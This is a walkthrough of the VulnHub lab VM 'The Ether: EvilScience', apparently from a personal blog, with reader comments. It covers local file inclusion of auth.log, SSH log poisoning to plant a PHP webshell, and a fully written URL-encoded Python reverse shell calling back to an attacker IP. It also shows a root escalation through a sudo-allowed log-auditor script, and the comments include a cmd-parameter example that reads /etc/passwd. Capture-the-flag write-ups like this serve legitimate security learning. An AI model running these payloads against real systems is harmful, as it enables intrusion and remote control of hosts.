The Ether: EvilScience – VulnHub Walkthrough

The Ether: EvilScience – VulnHub Walkthrough

Hi everyone, this is my solution for the VulnHub VM, The Ether: EvilScience.

Link: https://www.vulnhub.com/entry/the-ether-evilscience,212/

UPDATE (1/12/2017): As per the creator of this challenge, the Vulnhub version of this VM is faulty and has not been updated.

If you’re having issues please re-download the updated version from the authors site.

First steps as always is getting the IP of the VM using netdiscover

Quick Nmap scan to find how we can interact with the VM.

Browsing to port 80 we find what looks like could be a vulnerable include for an LFI/RFI

I spent far too long trying to get an LFI working on ‘/etc/passwd’. I used dotdotpwn a few times, trying different attempts at beating the filter with and without nullbytes (%00) without success. I eventually looked up some LFI cheat sheets for commonly accessible files and ran a list of these through burpsuite, trying different filters. Eventually finding that /var/log/auth.log was accessible through the LFI vector.

With this LFI available, we can use log poisoning to attempt to get remote code execution and a shell. Firstly injecting a simple webshell into the SSH auth.log by attempting to log in with a bad username.

From here we can call our webshell through the previously discovered LFI.

Seeing a Python script, I assume python is easily available so went with a Python reverse shell dropped through the LFI. The string is URL encoded with hackbar to prevent any issues.

python%20-c%20'import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.1.0.5%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(%5B%22/bin/sh%22,%22-i%22%5D);'

We can see an interesting Python script with a setuid bit set. Checking “sudo –list” shows us that we dont need a password to run it. Awesome!

Looks like when this script retrieves the log file you can also pipe commands onto the end and they will run as root as well. To check this I made a python script in /tmp that would ‘touch /tmp/testing’. Running this script with the xxxlogauditorxxx.py file generated a /tmp/testing file with root:root permissions.

Should just be able to get it to fire back another reverse shell and we should have root! The following shell script was made to spawn a revshell.

I used wget to retrieve it from my Kali box and give it executable permissions.

From here, I called the Python script and piped to the end my reverse shell.

This fired the reverse shell with root privileges! The flag is a .png file so I copied it to the web directory to grab it via the browser.

But… It’s not actually the flag.

Running strings against the flag.png file gives us some base64 encoded data that reveals the actual flag, the story of “The Ether”.

Running the flag through base64 decode we get the following

12 thoughts on “The Ether: EvilScience – VulnHub Walkthrough”

  1. Do you happen to have a link to the cheatsheet or the list of the commonly accessible files (did you compile these manually?) for LFI? I’m stuck at that same spot now too having tried manually everything I could think of.

  2. your sudo -l is surely not working for me. what exactly did you do? I am not able to obtain the info without a password:

    $ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    $ python -c ‘import pty;pty.spawn(“/bin/bash”)’
    [email protected]:/var/www/html/theEther.com/public_html$ ls -al
    ls -al
    total 11312
    drwxrwxr-x 4 root www-data 4096 Oct 24 20:55 .
    drwxr-xr-x 5 root root 4096 Oct 23 18:31 ..
    -rwxrwxr-x 1 root www-data 5891 Oct 23 19:27 about.php
    drwxrwxr-x 3 root www-data 4096 Oct 23 18:02 images
    -rwxrwxr-x 1 root www-data 6495 Oct 23 20:48 index.php
    drwxrwxr-x 4 root www-data 4096 Oct 23 18:02 layout
    -rwxrwxr-x 1 root www-data 5006 Oct 23 18:02 licence.txt
    -rwxrwxr-x 1 root www-data 10641 Oct 23 19:26 research.php
    -rwsrwsr-x 1 root evilscience 11527252 Oct 23 18:32 xxxlogauditorxxx.py
    [email protected]:/var/www/html/theEther.com/public_html$ sudo -l
    sudo -l
    sudo: unable to resolve host theEther: Connection refused
    [sudo] password for www-data:

    Sorry, try again.
    [sudo] password for www-data:

    Sorry, try again.
    [sudo] password for www-data:

    sudo: 3 incorrect password attempts

    • Hi mate, sorry to hear that. All i did was run a sudo list and i was able to get the details as my above screenshots. All i had done after getting the reverse shell to pop was just “sudo –list” and thats what came up for me.

      Checking on the challenge authors page he notes that there has been an update to the VM. If you try download it from this link http://www.mediafire.com/file/502nbnbkarsoisb/theEther.zip you should be able to get it working sweet

  3. Thanks Luke, new vm works great.

    Although I am still not convinced the setuid bit on /usr/bin/python2.7 and on the py script is needed after all. Imho the sudo command should be all you need. What’s your opinion?

    • No probs mordow. I actually only got the VM a few days ago and from the authors site when i was browsing around so I didnt go through the possible issues you would have, but I’d have been under the impression the setuid bit on the python script wouldnt have mattered a great deal but it was more reliant on the sudo command being what you’d use.

      I’m guessing you couldnt get it to work because it required a password when you tried to use it where-as for me it just worked? It was probably a sudo configuration issue that the author may have had to fix in the new version?

  4. Hey,
    Thank you for the post!

    can you tell me why we needed to inject the [‘CMD’], that is for windows right ? we are attacking a linux based machine not windows so how is windows a command line is needed ?
    Thanks

    • Hi Ben, the injection I used is for PHP. Basically I’m injecting a command that will run from a GET variable. The “system” call from PHP is what does the actual executing. You can check more about it here (http://php.net/system)

      Basically the $_GET[‘cmd’] just takes the argument i pass it (in the cmd variable), and gives it to “system” to execute it. In reality you can name the variable whatever you’d like. If you called your variable “foo”, it would look like this.

      http://x.x.x.x/index.php?file=%2fvar%2flog%2fauth.log&foo=cat%20/etc/passwd

      Hope that helps a bit.

      • Thank you for the amazing reply! i have small issue when i try to pass commands , php just translates them via my local machine and not passing it to the web server .. so example :
        It doesnt pass it to the 192.168.199.131 which is the target i have tried disabling the PHP but however it still does the same. any hints please.

        curl http://192.168.199.131/index.php?file=/var/log/auth.log&E=ls;ls -l
        [1] 5544
        total 8340
        -rw-r–r– 1 root root 311296 Nov 20 13:11 1.exe
        drwxr-xr-x 4 root root 4096 Nov 29 12:05 39772
        -rw——- 1 root root 5373 Nov 29 11:57 39772.txt
        -rw-r–r– 1 root root 4806 Nov 29 11:31 40616.c
        -rw-r–r– 1 root root 20105 Nov 29 11:37 40871.c
        -rwxr-xr-x 1 root root 23480 Nov 29 11:37 40871_root

Leave a comment